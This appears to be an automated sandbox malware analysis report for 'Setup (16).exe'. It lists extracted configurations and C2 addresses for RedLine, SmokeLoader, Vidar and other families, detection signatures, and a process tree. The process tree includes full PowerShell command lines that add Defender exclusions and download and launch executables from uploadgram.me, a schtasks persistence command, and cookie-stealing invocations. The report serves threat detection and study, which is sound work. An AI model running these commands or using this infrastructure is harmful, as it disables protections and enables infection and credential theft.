Resubmissions

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

28-08-2021 23:10

210828-rt8b9gzxn6 10

28-08-2021 22:59

210828-zxgnh5j4w6 10

28-08-2021 11:31

210828-xrjs66aknj 10

Analysis

  • max time kernel
    1807s
  • max time network
    1805s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    21-08-2021 10:21

General

  • Target

    Setup (16).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://dl.uploadgram.me/6120bc6269f31h?raw

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://dl.uploadgram.me/6120bcfeb5393h?raw

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://dl.uploadgram.me/6120c8f91373ch?raw

Extracted

Family

redline

Botnet

www

C2

185.204.109.146:54891

Extracted

Family

redline

Botnet

Second_7.5K

C2

45.14.49.200:27625

Extracted

Family

redline

Botnet

@Gerhdhd

C2

46.8.19.177:41228

Extracted

Family

redline

Botnet

dibild

C2

135.148.139.222:33569

Extracted

Family

redline

Botnet

20_8_rs

C2

jekorikani.xyz:80

Extracted

Family

redline

Botnet

19.08

C2

95.181.172.100:6795

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

C2

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32
rc4.i32

Extracted

Family

vidar

Version

40.1

Botnet

937

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    937

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 13 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • Blocklisted process makes network request 64 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 4 IoCs
  • Executes dropped EXE 64 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 12 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 10 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 12 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 27 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
  • Suspicious use of SetThreadContext 12 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 29 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 31 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 17 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 32 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 21 IoCs
  • Suspicious behavior: SetClipboardViewer 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 55 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
    1⤵
      PID:2852
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2836
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
        • Suspicious use of SetThreadContext
        • Modifies registry class
        PID:2756
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k SystemNetworkService
          2⤵
          • Drops file in System32 directory
          • Checks processor information in registry
          • Modifies data under HKEY_USERS
          PID:5640
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2608
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
            PID:2576
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1908
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1428
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1376
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1180
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1096
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:68
                      • C:\Users\Admin\AppData\Roaming\iawtjdt
                        C:\Users\Admin\AppData\Roaming\iawtjdt
                        2⤵
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:6740
                      • C:\Users\Admin\AppData\Roaming\iawtjdt
                        C:\Users\Admin\AppData\Roaming\iawtjdt
                        2⤵
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:4712
                      • C:\Users\Admin\AppData\Roaming\iawtjdt
                        C:\Users\Admin\AppData\Roaming\iawtjdt
                        2⤵
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:8284
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                      1⤵
                        PID:340
                      • C:\Users\Admin\AppData\Local\Temp\Setup (16).exe
                        "C:\Users\Admin\AppData\Local\Temp\Setup (16).exe"
                        1⤵
                        • Checks computer location settings
                        • Modifies system certificate store
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of WriteProcessMemory
                        PID:644
                        • C:\Users\Admin\Documents\qdiPB4meq13nFk5UlKW9uT4a.exe
                          "C:\Users\Admin\Documents\qdiPB4meq13nFk5UlKW9uT4a.exe"
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2328
                        • C:\Users\Admin\Documents\r6nIAvXvptrASf01qylEXgSM.exe
                          "C:\Users\Admin\Documents\r6nIAvXvptrASf01qylEXgSM.exe"
                          2⤵
                          • Executes dropped EXE
                          PID:4088
                          • C:\Users\Admin\Documents\r6nIAvXvptrASf01qylEXgSM.exe
                            "C:\Users\Admin\Documents\r6nIAvXvptrASf01qylEXgSM.exe"
                            3⤵
                            • Modifies data under HKEY_USERS
                            PID:5832
                        • C:\Users\Admin\Documents\4o8z498S3NFw6NLde1AG81tk.exe
                          "C:\Users\Admin\Documents\4o8z498S3NFw6NLde1AG81tk.exe"
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • Suspicious use of WriteProcessMemory
                          PID:2588
                          • C:\Users\Admin\Documents\4o8z498S3NFw6NLde1AG81tk.exe
                            C:\Users\Admin\Documents\4o8z498S3NFw6NLde1AG81tk.exe
                            3⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4620
                        • C:\Users\Admin\Documents\YiG52tRDnJRnsFemSTVT81x1.exe
                          "C:\Users\Admin\Documents\YiG52tRDnJRnsFemSTVT81x1.exe"
                          2⤵
                            PID:1664
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', '%Temp%\\installer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', '%AppData%\\RuntimeBroker.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', '%Temp%\\launcher.exe') & powershell Start-Process -FilePath '%Temp%\\installer.exe' & powershell Start-Process -FilePath '%AppData%\\RuntimeBroker.exe' & powershell Start-Process -FilePath '%Temp%\\launcher.exe' & exit
                              3⤵
                                PID:4648
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                  4⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4108
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                  4⤵
                                    PID:8664
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                    4⤵
                                    • Blocklisted process makes network request
                                    • Executes dropped EXE
                                    PID:5340
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                    4⤵
                                      PID:6744
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', 'C:\Users\Admin\AppData\Local\Temp\\installer.exe')
                                      4⤵
                                        PID:880
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe')
                                        4⤵
                                          PID:8340
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe')
                                          4⤵
                                            PID:8508
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\installer.exe'
                                            4⤵
                                              PID:2828
                                              • C:\Users\Admin\AppData\Local\Temp\installer.exe
                                                "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                5⤵
                                                  PID:8648
                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                    "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                                                    6⤵
                                                      PID:6212
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                        7⤵
                                                          PID:7240
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                          7⤵
                                                          • Loads dropped DLL
                                                          PID:5256
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                          7⤵
                                                            PID:6556
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                            7⤵
                                                            • Loads dropped DLL
                                                            • Adds Run key to start application
                                                            PID:2016
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                          6⤵
                                                            PID:5036
                                                            • C:\Users\Admin\AppData\Local\Temp\svchost32.exe
                                                              C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                              7⤵
                                                              • Drops file in System32 directory
                                                              PID:8764
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
                                                                8⤵
                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                PID:6704
                                                                • C:\Windows\system32\schtasks.exe
                                                                  schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
                                                                  9⤵
                                                                  • Creates scheduled task(s)
                                                                  PID:7504
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe'
                                                        4⤵
                                                          PID:6980
                                                          • C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
                                                            "C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"
                                                            5⤵
                                                            • Adds Run key to start application
                                                            • Suspicious behavior: SetClipboardViewer
                                                            PID:876
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe'
                                                          4⤵
                                                            PID:8596
                                                            • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\launcher.exe"
                                                              5⤵
                                                              • Suspicious use of SetThreadContext
                                                              PID:8796
                                                              • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                                                                "{path}"
                                                                6⤵
                                                                  PID:9152
                                                                  • C:\Windows\System32\Conhost.exe
                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    7⤵
                                                                      PID:8508
                                                          • C:\Users\Admin\Documents\F6z1ChNbJtxu6TBLsJejrASp.exe
                                                            "C:\Users\Admin\Documents\F6z1ChNbJtxu6TBLsJejrASp.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            • Checks BIOS information in registry
                                                            • Checks whether UAC is enabled
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2552
                                                          • C:\Users\Admin\Documents\KC1MggmWxBagbR5n3yZwX95M.exe
                                                            "C:\Users\Admin\Documents\KC1MggmWxBagbR5n3yZwX95M.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            • Checks BIOS information in registry
                                                            • Checks whether UAC is enabled
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:3696
                                                          • C:\Users\Admin\Documents\bJl89sVP2b0aAfOUpoizxyeI.exe
                                                            "C:\Users\Admin\Documents\bJl89sVP2b0aAfOUpoizxyeI.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            PID:500
                                                            • C:\Users\Admin\Documents\bJl89sVP2b0aAfOUpoizxyeI.exe
                                                              C:\Users\Admin\Documents\bJl89sVP2b0aAfOUpoizxyeI.exe
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:4628
                                                          • C:\Users\Admin\Documents\jEok6ecu_YIVzkfLRrRghuQr.exe
                                                            "C:\Users\Admin\Documents\jEok6ecu_YIVzkfLRrRghuQr.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            PID:2188
                                                          • C:\Users\Admin\Documents\aPRP8GHGTB_SaD4tDsEbGov6.exe
                                                            "C:\Users\Admin\Documents\aPRP8GHGTB_SaD4tDsEbGov6.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2248
                                                            • C:\Users\Admin\AppData\Roaming\3323212.exe
                                                              "C:\Users\Admin\AppData\Roaming\3323212.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:1280
                                                            • C:\Users\Admin\AppData\Roaming\4108427.exe
                                                              "C:\Users\Admin\AppData\Roaming\4108427.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • Adds Run key to start application
                                                              PID:4832
                                                              • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                4⤵
                                                                • Executes dropped EXE
                                                                PID:4912
                                                            • C:\Users\Admin\AppData\Roaming\2686728.exe
                                                              "C:\Users\Admin\AppData\Roaming\2686728.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2316
                                                          • C:\Users\Admin\Documents\1Cxq4sGnZGtbj6rZpTbzVWtp.exe
                                                            "C:\Users\Admin\Documents\1Cxq4sGnZGtbj6rZpTbzVWtp.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            PID:2204
                                                            • C:\Users\Admin\Documents\1Cxq4sGnZGtbj6rZpTbzVWtp.exe
                                                              C:\Users\Admin\Documents\1Cxq4sGnZGtbj6rZpTbzVWtp.exe
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:4636
                                                          • C:\Users\Admin\Documents\nWuuyBQLNt1P3X7tJVYIWJYJ.exe
                                                            "C:\Users\Admin\Documents\nWuuyBQLNt1P3X7tJVYIWJYJ.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:3944
                                                            • C:\Users\Admin\Documents\nWuuyBQLNt1P3X7tJVYIWJYJ.exe
                                                              C:\Users\Admin\Documents\nWuuyBQLNt1P3X7tJVYIWJYJ.exe
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:4612
                                                          • C:\Users\Admin\Documents\Wiz9l2wwYYWnRgzySxF3zGPy.exe
                                                            "C:\Users\Admin\Documents\Wiz9l2wwYYWnRgzySxF3zGPy.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:3956
                                                          • C:\Users\Admin\Documents\7oPgYyBu1KgmtYVbwMyGgswj.exe
                                                            "C:\Users\Admin\Documents\7oPgYyBu1KgmtYVbwMyGgswj.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            • Checks BIOS information in registry
                                                            • Checks whether UAC is enabled
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:1248
                                                          • C:\Users\Admin\Documents\asOyqKjnJCxvmHmTCNnKqgWs.exe
                                                            "C:\Users\Admin\Documents\asOyqKjnJCxvmHmTCNnKqgWs.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            PID:1212
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1212 -s 660
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • Program crash
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:1664
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1212 -s 676
                                                              3⤵
                                                              • Program crash
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:3188
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1212 -s 720
                                                              3⤵
                                                              • Program crash
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:5092
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1212 -s 648
                                                              3⤵
                                                              • Program crash
                                                              PID:4116
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1212 -s 1160
                                                              3⤵
                                                              • Program crash
                                                              PID:3276
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1212 -s 1144
                                                              3⤵
                                                              • Program crash
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:5100
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1212 -s 1072
                                                              3⤵
                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                              • Program crash
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:5112
                                                          • C:\Users\Admin\Documents\ah1mBLkMua75p5FH7HhhxjTd.exe
                                                            "C:\Users\Admin\Documents\ah1mBLkMua75p5FH7HhhxjTd.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            PID:4040
                                                            • C:\Users\Admin\Documents\ah1mBLkMua75p5FH7HhhxjTd.exe
                                                              "C:\Users\Admin\Documents\ah1mBLkMua75p5FH7HhhxjTd.exe" -q
                                                              3⤵
                                                              • Executes dropped EXE
                                                              PID:1564
                                                          • C:\Users\Admin\Documents\kaNrIqrWM3m5trM0gmhKuZi8.exe
                                                            "C:\Users\Admin\Documents\kaNrIqrWM3m5trM0gmhKuZi8.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            PID:2272
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2272 -s 760
                                                              3⤵
                                                              • Program crash
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:4524
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2272 -s 784
                                                              3⤵
                                                              • Program crash
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:4800
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2272 -s 812
                                                              3⤵
                                                              • Program crash
                                                              PID:5212
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2272 -s 836
                                                              3⤵
                                                              • Program crash
                                                              PID:5676
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2272 -s 956
                                                              3⤵
                                                              • Program crash
                                                              PID:5976
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2272 -s 984
                                                              3⤵
                                                              • Program crash
                                                              PID:6136
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2272 -s 1004
                                                              3⤵
                                                              • Program crash
                                                              PID:4216
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2272 -s 1388
                                                              3⤵
                                                              • Program crash
                                                              PID:6096
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2272 -s 1452
                                                              3⤵
                                                              • Program crash
                                                              PID:5996
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2272 -s 1544
                                                              3⤵
                                                              • Program crash
                                                              PID:6084
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2272 -s 1576
                                                              3⤵
                                                              • Program crash
                                                              PID:4412
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2272 -s 1528
                                                              3⤵
                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                              • Program crash
                                                              PID:6952
                                                          • C:\Users\Admin\Documents\R8NCHOP3TbeyeuphmKFNgdHk.exe
                                                            "C:\Users\Admin\Documents\R8NCHOP3TbeyeuphmKFNgdHk.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            • Drops file in Program Files directory
                                                            PID:4208
                                                            • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                              "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              PID:2148
                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                4⤵
                                                                • Executes dropped EXE
                                                                PID:3276
                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                4⤵
                                                                  PID:2936
                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  4⤵
                                                                  • Executes dropped EXE
                                                                  PID:5748
                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  4⤵
                                                                  • Executes dropped EXE
                                                                  PID:5684
                                                                • C:\Windows\system32\WerFault.exe
                                                                  C:\Windows\system32\WerFault.exe -u -p 2148 -s 1528
                                                                  4⤵
                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                  • Program crash
                                                                  PID:5672
                                                              • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                3⤵
                                                                • Executes dropped EXE
                                                                • Checks whether UAC is enabled
                                                                • Drops file in Program Files directory
                                                                PID:5076
                                                              • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                3⤵
                                                                • Executes dropped EXE
                                                                PID:5004
                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
